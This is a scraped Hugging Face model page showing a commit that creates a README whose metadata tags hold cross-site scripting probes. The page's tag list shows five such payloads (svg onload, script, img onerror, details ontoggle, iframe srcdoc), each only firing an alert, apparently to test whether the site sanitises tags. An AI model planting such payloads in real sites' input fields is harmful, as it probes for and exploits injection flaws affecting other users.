Hugging Face
Models
Datasets
Spaces
Community
Docs
Enterprise
Pricing
Log In
Sign Up
ccsh
/
test4Jan
like
0
agent
<svg onload=alert('XSS via tags')>
<script>alert('XSS Attack!')</script>
<img src=x onerror="alert('XSS via img tag')">
<details open ontoggle=alert('XSS')>
<iframe srcdoc="<script>alert('XSS')</script>">
Model card
Files
Files and versions
xet
Community
ccsh
commited on
Sep 23, 2025
Commit
b06df6b
·
verified
·
1 Parent(s):
1343161
Create README.md
Browse files
Files changed (1)
hide
show
README.md
+5
-0
README.md
CHANGED
Viewed
@@ -0,0 +1,5 @@
1
+
---
2
+
tags:
3
+
- agent
4
+
- "<svg onload=alert('XSS via tags')>"
5
+
---